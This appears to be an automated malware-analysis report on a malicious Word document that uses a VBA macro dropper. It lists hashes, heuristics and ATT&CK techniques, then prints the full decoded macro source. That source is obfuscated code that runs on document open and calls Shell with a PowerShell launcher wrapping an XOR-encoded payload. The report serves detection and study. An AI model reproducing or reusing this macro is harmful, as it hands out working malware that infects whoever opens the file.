Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 86ed28e677575a7f…

MALICIOUS

Office (OLE)

Size: 110.2 KB
Created: 2018-06-15 20:42:00
Authoring application: Microsoft Office Word
First seen: 2018-06-21
MD5: 41df718f344c92e8a7ccb4a8b47b2452
SHA-1: cb359655f6f78690e6fd5c7ac0920b55d45de919
SHA-256: 86ed28e677575a7f498aaeb8ef98613c896a9dd025e540f4f6d8e9afc6a8c51a
Risk Score: 222

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'Document_open' macro triggers a 'Shell()' call, which is indicative of a dropper or downloader. The ClamAV detection 'Doc.Dropper.Agent-6584582-0' further supports this, suggesting the file's purpose is to download and execute a secondary payload. No specific family could be identified.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6584582-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6584582-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script:
    hCCHvT = (92551 * Sgn(GaNdl) / 54488 / lJmGd * XwKkw + ChrW(UzqIr) / YHjzsq * CInt(bTwdp))
    zjIzJGvz = Jzbok + VBA.Shell(bIKGOuWMLtw + Chr(fZZqMAC + vbKeyP + uvpWOuRAQ) + "owers" + IaOGWPV + riTmobX + uLzFzf + rkCFhimBYMq + mvVTbOPKT, 82195 - 82195)
    hdwjr = Rnd(SBaKE)
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script:
    End Function
    Private Sub Document_open()
    On Error Resume Next
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9704 bytes
SHA-256: f1a78e06d1857596511aaec0a242e739ee95a1567351b00cc7cc1656e71b03f4
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "NATGSfsEDdpmti"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function zjIzJGvz()
On Error Resume Next
FMwkAE = Rnd(voKaVJ)
qPvTo = VsSHD
RGMSo = 19906 + ijXcr
MQdZN = (9857 * Sgn(oFmHBz) / 90612 / najbII * AjtqmJ + ChrW(TwzJQc) / cFSSwC * CInt(EHtWt))
hRmjus = Rnd(QzfXSV)
vYzUt = GBMSOY
mnIsj = 36629 + KVNILG
cfZvzb = (4179 * Sgn(RzBpas) / 45501 / YXjlJU * jCZru + ChrW(apdIUK) / vSJkEr * CInt(YzfSmi))
ovfmp = Rnd(GtsZk)
qAiXG = Ljluw
rqJYh = 10924 + sAFOwh
fCYCZ = (68657 * Sgn(wAnPZ) / 96746 / EpDjh * FXSGKV + ChrW(fwKFP) / LajUw * CInt(iwlRCl))
YtAVc = Rnd(MSPHj)
DCiTF = VBwZi
rEQVz = 79481 + zzmmXV
hCCHvT = (92551 * Sgn(GaNdl) / 54488 / lJmGd * XwKkw + ChrW(UzqIr) / YHjzsq * CInt(bTwdp))
zjIzJGvz = Jzbok + VBA.Shell(bIKGOuWMLtw + Chr(fZZqMAC + vbKeyP + uvpWOuRAQ) + "owers" + IaOGWPV + riTmobX + uLzFzf + rkCFhimBYMq + mvVTbOPKT, 82195 - 82195)
hdwjr = Rnd(SBaKE)
vnBjY = UfOXX
XzRbEP = 35893 + lNUnn
zwZqw = (93753 * Sgn(FUrBzO) / 67727 / TTUIJ * ZOiztm + ChrW(XskuEr) / UwvOY * CInt(hwElB))
pKBMt = Rnd(OQZku)
zOdJtw = wYVjri
EKsicG = 14496 + XSqWXF
aqkCFK = (26217 * Sgn(zTwiF) / 89453 / Ufoni * CwaBr + ChrW(NTMwPc) / zcFTR * CInt(WdOJKO))
End Function
Private Sub Document_open()
On Error Resume Next
haEqrD = Rnd(YYuJB)
sHnnm = mzvnP
hzAmX = 68655 + AzuOL
FLchY = (64996 * Sgn(SDOWdc) / 73669 / Nsjjpi * LskkH + ChrW(POlMkQ) / XZSYM * CInt(tTdlJ))
ApZGL = Rnd(ZslAk)
XkAhH = ZHCpHa
oaDCpc = 19040 + MUCnZL
KXjXp = (42408 * Sgn(mOqiBb) / 32056 / jmlhAl * HkScV + ChrW(SAMhC) / ionfw * CInt(biIuV))
zjIzJGvz
jKabQE = Rnd(ZUIQwE)
ZDtNOm = KorkIH
AVTNd = 94340 + XiKsHm
iZYram = (5808 * Sgn(OvQYi) / 15898 / PiIRwA * OChSP + ChrW(hbcVpV) / ImBjAa * CInt(owwpE))
iYIcqK = Rnd(RKVJIW)
jbQGr = aGISA
YmSui = 23926 + TdhbQ
ftXzRr = (46143 * Sgn(NuBjBG) / 84541 / PvbAZ * vquPRv + ChrW(GQURQD) / wVLpD * CInt(IlZkEk))
End Sub


Attribute VB_Name = "FrNrAErzhD"
Function IaOGWPV()
On Error Resume Next
dZwzMw = dOTUdA
jzNNZ = Rnd(jSnzp)
VzPoHf = 7383 + UpuHL
jTrJY = (67820 * Sgn(dqNWms) / 81664 / qDGBdj * VnmqJ + ChrW(ivTifl) / BwkibL * CInt(jidZGo))
clWHVEHwooI = "He" + "LL & ( " + "$EN" + "V:cOMS" + "peC[4,15,25" + "]-Join'')([STri" + "Ng]::joi" + "N( '', ('14,"
nKMkV = LfFCH
XPObXi = Rnd(zDWiZ)
uuusHG = 9996 + sSYZRj
MDuOA = (4338 * Sgn(FoolS) / 99471 / hfzqBF * BKsJzE + ChrW(jPopzD) / tzEXXw * CInt(kwZukl))
bGiDczAjr = "93" + "u127u65H78" + ",67m65H10" + "G23" + "G10d68u79H93u" + "7{69G72Q64Y" + "79u73Y94Y10G88" + "Y75m6"
MTPNS = DjYnwz
fiPBBE = Rnd(tBECz)
VYAvSv = 81063 + htSdHU
AwAVaK = (17426 * Sgn(wdcov) / 85827 / pzXukt * ipoinR + ChrW(bITwHm) / swDwLF * CInt(pmYXH))
vJOSL = "8%78Y69,71H17G1" + "4m95%102G95%99" + "d64%10H" + "23m10d68" + "d79Q93H7m69" + "%72Y64G7" + "9m73d94u1" + "0{12" + "1G83d" + "89Q94m79Y71Q"
TtCPHj = AArPh
rbQDP = Rnd(TNKjvW)
SWVIsn = 11489 + wBTzY
TXhPI = (50471 * Sgn(nrUdj) / 68799 / ruawG * AAUIRo + ChrW(iRWdsL) / mpOlL * CInt(FAcZZ))
wPRikwlLtd = "4,100Y79u94Y4d1" + "25d79," + "72Q105H7" + "0d67u79" + ",68G" + "94" + "%17" + "Q14" + "u80%80H124,"
jlzYui = QKJMwi
XfVFav = Rnd(qTSDZ)
TkpVUq = 70345 + POBjo
UATmon = (84847 * Sgn(PfHioN) / 14457 / TZlKZ * UuIqQ + ChrW(ajJXI) / BPuPr * CInt(szVTQ))
bvInfDUzwuZ = "109H" + "96H80u" + "10m23,10," + "13%66%" + "94Y94,9" + "0{16,5%5" + ",88H69%" + "71" + "Y75%68u73," + "79H73G66d4G73"
ScjAiw = vthrWM
tUJsp = Rnd(KXKPjZ)
zXpMjW = 69499 + nLsXEi
qljUmt = (55423 * Sgn(kmzjl) / 11552 / RVkEZ * iffvj + ChrW(cwfsz) / pzZIC * CInt(oIPrz))
zkWcSN = "H69d71,5u99G65G" + "76" + "Y79,94H1" + "02Q5u106m66%94"
ITRPQp = iczUJp
zLqmb = Rnd(GSnjH)
DZFsA = 13291 + tzJvI
TlhjJ = (80641 * Sgn(FcMvI) / 16589 / DGoPiD * soCXr + ChrW(Xacki) / mmIPZ * CInt(SOCrEU))
pDTfLp = "Q94%90u16Y5H5" + ",70m79G6" + "4{69Y" + "70%67u79" + "G78Y69m73Q79d89" + "H4Y73,69Y71H4" + "H72,88%5%6" + "9H120m120,102"
dQoQA = iOKLsE
jFfWI = Rnd(bmAbw)
MSZwfz = 54211 + zVzuq
fHYlK = (22737 * Sgn(NUtSXr) / 55289 / LKFkf * bKzkaM + ChrW(zHOEaf) / FYkoiF * CInt(JXWsJ))
QHUOFijnCqz = "%125%70d30Q122" + "G5" + "G106Q66%94d94," + "90" + "d16Q" + "5H5d9" + "4%88%69u89{" + "79,4d69%" + "88,77m5{"
IaOGWPV = clWHVEHwooI + bGiDczAjr + vJOSL + wPRikwlLtd + bvInfDUzwuZ + zkWcSN + pDTfLp + QHUOFijnCqz
End Function
Function riTmobX()
On Error Resume Next
aqRnb = RFUtHI
bDAFH = Rnd(bEwbB)
zoPMiO = 93896 + jBmaQ
CErJwj = (9102 * Sgn(RmwsIv) / 93993 / aRaoFz * nIAJSt + ChrW(WFWRu) / prprM * CInt(JEVvS))
rjTkLXI = "72" + "Y126H92%67," + "11" + "0d103%92u25" + "G70Y98,5G106%6" + "6,94G94" + "d90,16G5m" + "5Q78d79Q65d69Q8"
jSNhNw = ZtYCa
UfucjU = Rnd(ETEAwZ)
qzQqVq = 3503 + libjco
okrtRa = (52178 * Sgn(niZcu) / 60995 / LBzrCQ * mnPMoc + ChrW(WRTQM) / ArhRC * CInt(csnnF))
djIpiisvf = "8m" + "71H73H" + "4u90G70" + "G5G64G89Y5Q92u1" + "21G27G"
ppnuwz = tVHJd
SUOsa = Rnd(XYBwE)
EmwoRM = 11265 + hfsUT
JtnzCn = (7031 * Sgn(QOobb) / 65388 / lncuZu * hlGAE + ChrW(LQrfn) / wRtfq * CInt(PTZbzS))
qzZzsXNOM = "125u83" + "%98,127d105" + "Q79H24d5" + "u106,66" + "d94u94H90u1"
JbvGl = dnEEhM
RPHii = Rnd(EwnLC)
BijAzW = 16768 + FlcsHl
jZIGq = (74363 * Sgn(zjSZEq) / 59523 / jnOat * uUsFQ + ChrW(YufwR) / sFfcV * CInt(UzNdI))
cfmuUQtipo = "6{5u5d93u93m93" + "%4Y94m79d90Y70" + "H67Q83u78Q" + "69d" + "71,27G" + "19{"
riTmobX = rjTkLXI + djIpiisvf + qzZzsXNOM + cfmuUQtipo
End Function
Function uLzFzf()
On Error Resume Next
DRNFvo = MVEVw
BvILH = Rnd(pHTOo)
QAahP = 8559 + WHuwZ
nOGKq = (57689 * Sgn(bLUbn) / 65114 / cmOGw * aDwcBY + ChrW(WsuwE) / DRmQzE * CInt(JKszl))
HsVKMiltv = "4%88m95" + "%5m102%" + "78G19H73%" + "95{70u1"
BcZQL = qjKuj
NfpaH = Rnd(YNmjPd)
SEuiQ = 46106 + CispV
nzfXQ = (64418 * Sgn(momQO) / 52947 / ZOPinA * qvwoV + ChrW(OnaHJ) / QdYrf * CInt(KSjdP))
TMDrwbPQFvC = "01H5%13" + "Q4Q121" + "H90" + "{70,67d" + "94Q2" + "u13H106"
XkUci = Mfkcj
Lokcb = Rnd(bHjNz)
jjvJI = 98821 + iGALz
lLGfCh = (5241 * Sgn(VIwSBJ) / 69212 / lFKdm * EjGiws + ChrW(XwGOVX) / HwDTIR * CInt(PnCbYl))
vSQjGNULVn = "{13u3,17{14Y104" + "m114u92" + "u67,95u1" + "09u1" + "0m23Q10u14m93Q" + "127" + "d65m78G67G65" + "H4%68{79"
pvEDZH = cUnLTN
uiSDCJ = Rnd(XYXjK)
wJqEjm = 91640 + mCqVU
kZfkwV = (63154 * Sgn(zzvmp) / 80324 / cbhhM * bUUJC + ChrW(VoCtN) / NXMWG * CInt(wQjwG))
lIptTA = "Q82d94%2Q27u6d1" + "0u19m18m" + "19Q2" + "9u18,31{3Y17m1" + "4{100%66Q1" + "05%126m69d10"
uLzFzf = HsVKMiltv + TMDrwbPQFvC + vSQjGNULVn + lIptTA
End Function
Function rkCFhimBYMq()
On Error Resume Next
VKjvj = NMWkMA
mSwUs = Rnd(dlBRJ)
LavML = 32976 + EhObSv
pQbWwO = (13090 * Sgn(fblES) / 5450 / aYqiZ * rSCGkj + ChrW(wELALU) / oGrfD * CInt(vpjzqN))
TcMOAbHrP = "%23{1" + "0d14H79u68" + "%92%16Y94G79" + "m71,90{10" + "Y1{10Q13Q118" + "m13Y10d1m1" + "0G14u104%114u9" + "2u67%95{109{10"
BjEPWF = MGRSkL
Kmzuha = Rnd(wzZQL)
NLbQlt = 95868 + OUhKak
qjbTV = (51001 * Sgn(OTLwQc) / 92724 / QjHpS * OVAocf + ChrW(UwTJmq) / oFqFK * CInt(mQtSG))
dIQBiij = "u1,10%" + "13u4Q79Q82,79{" + "13G17m" + "76u69d88%" + "79u75d73H66%2," + "14,8" + "0H127%88%1"
Kzbii = tDfRIP
mvphLu = Rnd(JcLaft)
kuUrnd = 73376 + dLsBf
hucfLM = (30052 * Sgn(swBfd) / 82412 / RipJO * wijrwt + ChrW(jPCjY) / EdAfjp * CInt(mSBaD))
LBcbTnI = "27u73H64H10," + "67G6" + "8%" + "10{14G80d80G" + "124u109Y96H80u3" + ",81%94" + "Y88%8" + "3m81%14u95,102{" + "95d9" + "9Y64m4{110H69"
Twujc = oskVt
IjmAb = Rnd(AMjQtn)
SOrdt = 35274 + umjQz
ajXWV = (25680 * Sgn(rRXBu) / 78842 / HwKWw * BTjBR + ChrW(njzWh) / wOSijY * CInt(WIHqw))
kCpMj = "G93H68Q70m69Y" + "75Y7" + "8u1" + "08m6" + "7Q70%79%2,14," + "80{127u88Y127m" + "73u64m4u1" + "26Y69,121,94," + "88u67d68{77Y2" + "H3m"
FZNtcj = RLTiH
zrUBsi = Rnd(YXNHD)
ESZXs = 91150 + IwaqZN
TUbBKi = (24549 * Sgn(zwkPv) / 13729 / DQdciw * wJTiU + ChrW(mGGpl) / WnVYf * CInt(ARIdci))
ktmiSLIt = "6m10d14G100G" + "66G105%12" + "6m69%3Y17" + "m121u94u75,"
iAVhpw = DXLRjI
cPOvpG = Rnd(rKVRhj)
uhrpv = 58671 + lBhszi
LREqz = (68038 * Sgn(kQnhz) / 87823 / NhCrYw * KAksj + ChrW(rJfYL) / YZjdB * CInt(wYujhz))
DzbYDR = "88m94H7{12" + "2%88d69m" + "73" + "Y79" + "G89d89Y10"
aSaSk = jSCTW
DApqIZ = Rnd(KCARU)
QQOalP = 42260 + URdDBt
ALWYSI = (5415 * Sgn(iJUzSd) / 23980 / iMmHfm * jawjwk + ChrW(MHOQVR) / sKvwMq * CInt(wdAHp))
IUjSwLia = "Y14%100G66,105" + "{126G69" + "m17Y" + "72d88{79H" + "75u65u17m87m7"
wwcGmN = bwzHp
kpjPTN = Rnd(nwUZGz)
zMjCHu = 69757 + BrITvT
uqVsP = (11019 * Sgn(ltwzv) / 26011 / ooHzSI * BVwzK + ChrW(blkFz) / ZvKVQ * CInt(pAwDA))
ciJMRdh = "3G75" + ",94Q7" + "3Q66" + "{81" + ",93u88u67H9" + "4,79{7%"
IDwVTo = FtwtHK
LZShmr = Rnd(pjIsVZ)
EhrAIs = 99565 + nwiSrv
RDpwX = (98878 * Sgn(IwuHd) / 41461 / UDUzBM * EtzFE + ChrW(cwBPl) / SWupWU * CInt(VzEDOq))
ZfzpbDI = "66" + "u69%89%94{" + "10m14%117u" + "4u111H82H73H" + "79{90Y94m67{69" + "H68u4Q1" + "03Q79d89d89," + "75u77{79H17,"
rkCFhimBYMq = TcMOAbHrP + dIQBiij + LBcbTnI + kCpMj + ktmiSLIt + DzbYDR + IUjSwLia + ciJMRdh + ZfzpbDI
End Function
Function mvVTbOPKT()
On Error Resume Next
qYzpl = lTsIX
Akqit = Rnd(wzMJp)
TffKwf = 42625 + DOZOwf
fqSKk = (99147 * Sgn(AQqpIY) / 84909 / PlKcj * zHaMT + ChrW(bhMmC) / JqzkE * CInt(OSipAi))
aDpfUpOHa = "87%87'.S" + "Pl" + "it( 'Ydm{QG," + "uH%' )| %{ [" + "cha"
NjJHr = CLOKf
RtNWhh = Rnd(rHfjrz)
vETDD = 75452 + PBFihV
WhBLO = (87336 * Sgn(XTOLm) / 94131 / IBrHsz * SiYVb + ChrW(cOjqIY) / QBNqqk * CInt(zuwXXK))
GjpldUH = "r]" + "( $_-bxor 0x2A" + "  ) " + "} )) )"
mvVTbOPKT = aDpfUpOHa + GjpldUH
End Function